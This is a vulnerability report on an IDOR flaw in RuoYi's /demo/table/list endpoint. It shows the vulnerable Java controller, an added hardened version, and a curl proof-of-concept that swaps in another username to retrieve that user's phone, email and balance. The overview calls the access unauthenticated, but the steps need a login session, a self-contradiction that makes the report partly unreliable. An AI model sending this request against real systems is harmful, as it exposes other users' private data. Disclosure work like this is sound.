RuoYi System Unauthorized Data Access Vulnerability Report
Overview
A horizontal privilege escalation vulnerability exists in the RuoYi framework's demo functionality. The /demo/table/list API endpoint allows unauthenticated access to sensitive user data without proper authorization checks, enabling attackers to retrieve private information of any system user.
Vulnerability Details
Type: Horizontal Privilege Escalation (IDOR)
CWE-ID: CWE-639: Authorization Bypass Through User-Controlled Key
Affected Component: com.ruoyi.web.controller.demo.controller.DemoTableController.list()
Vulnerability Analysis
The vulnerable controller method processes requests without authorization checks (the declaration of userList and the response assembly are filled in to make the excerpt complete; the report itself shows only the filter loop):

@PostMapping("/list")
@ResponseBody
public TableDataInfo list(UserTableModel userModel) {
    // No permission or ownership verification before the lookup
    List<UserTableModel> userList = new ArrayList<>(users);
    if (StringUtils.isNotEmpty(userModel.getUserName())) {
        userList.clear();
        // Directly filters all users by the username supplied in the request
        for (UserTableModel user : users) {
            if (user.getUserName().equals(userModel.getUserName())) {
                userList.add(user); // Adds matching user without checking that the caller owns it
            }
        }
    }
    // Returns sensitive user data for whichever username the caller requested
    TableDataInfo rspData = new TableDataInfo();
    rspData.setRows(userList);
    rspData.setTotal(userList.size());
    return rspData;
}
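A hardened version of the filtering logic, as an added example that is not part of this report or of RuoYi's code base: the row a caller may see is fixed by the server-side login name rather than by the userName parameter, and filtering by arbitrary names is reserved for callers holding a listing permission. The class OwnershipCheckDemo, the method listForCaller and the stand-in UserTableModel are assumptions; in RuoYi the caller's login name and permission would come from the Shiro session, not from the request body.

```java
import java.util.ArrayList;
import java.util.List;

public class OwnershipCheckDemo {

    // Minimal stand-in for RuoYi's UserTableModel, carrying only the fields this check needs.
    static class UserTableModel {
        private final String userName;
        private final String userPhone;
        UserTableModel(String userName, String userPhone) {
            this.userName = userName;
            this.userPhone = userPhone;
        }
        String getUserName() { return userName; }
        String getUserPhone() { return userPhone; }
    }

    // Hardened equivalent of the loop in DemoTableController.list(): the caller's identity
    // and privilege are passed in from the server-side session (assumed), never from input.
    static List<UserTableModel> listForCaller(List<UserTableModel> users, String requestedName,
                                              String callerLoginName, boolean callerMayListAll) {
        if (callerMayListAll && (requestedName == null || requestedName.isEmpty())) {
            return new ArrayList<>(users); // unfiltered listing, privileged callers only
        }
        // A non-privileged caller's view is fixed to their own row regardless of what they asked for.
        String effectiveName = callerMayListAll ? requestedName : callerLoginName;
        List<UserTableModel> result = new ArrayList<>();
        for (UserTableModel user : users) {
            if (user.getUserName().equals(effectiveName)) {
                result.add(user);
            }
        }
        return result;
    }

    public static void main(String[] args) {
        // Constructed sample data, not taken from the report.
        List<UserTableModel> users = new ArrayList<>();
        users.add(new UserTableModel("attacker", "138****0000"));
        users.add(new UserTableModel("target_user", "139****1234"));

        // A plain user requesting target_user's row only ever receives their own row.
        List<UserTableModel> asUser = listForCaller(users, "target_user", "attacker", false);
        System.out.println("as attacker: " + asUser.size() + " row(s), " + asUser.get(0).getUserName());

        // A caller holding the listing permission keeps the original filter-by-name behaviour.
        List<UserTableModel> asAdmin = listForCaller(users, "target_user", "admin", true);
        System.out.println("as admin: " + asAdmin.size() + " row(s), " + asAdmin.get(0).getUserName());
    }
}
```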
PoC
Reproduction Steps
- Obtain valid session cookie through normal login
- Send malicious request with modified username parameter:
curl 'http://victim-system/demo/table/list' \
-X POST \
-H 'Content-Type: application/x-www-form-urlencoded' \
-H 'Cookie: JSESSIONID=attacker_session' \
--data-raw 'userModel.userName=target_user'
Expected Result
{
  "total": 1,
  "rows": [{
    "userId": 5,
    "userCode": "1000005",
    "userName": "target_user",
    "userPhone": "139****1234",
    "userEmail": "[email protected]",
    "userBalance": 9500.00,
    "status": "0",
    "createTime": "2025-06-01 08:30:15"
  }]
}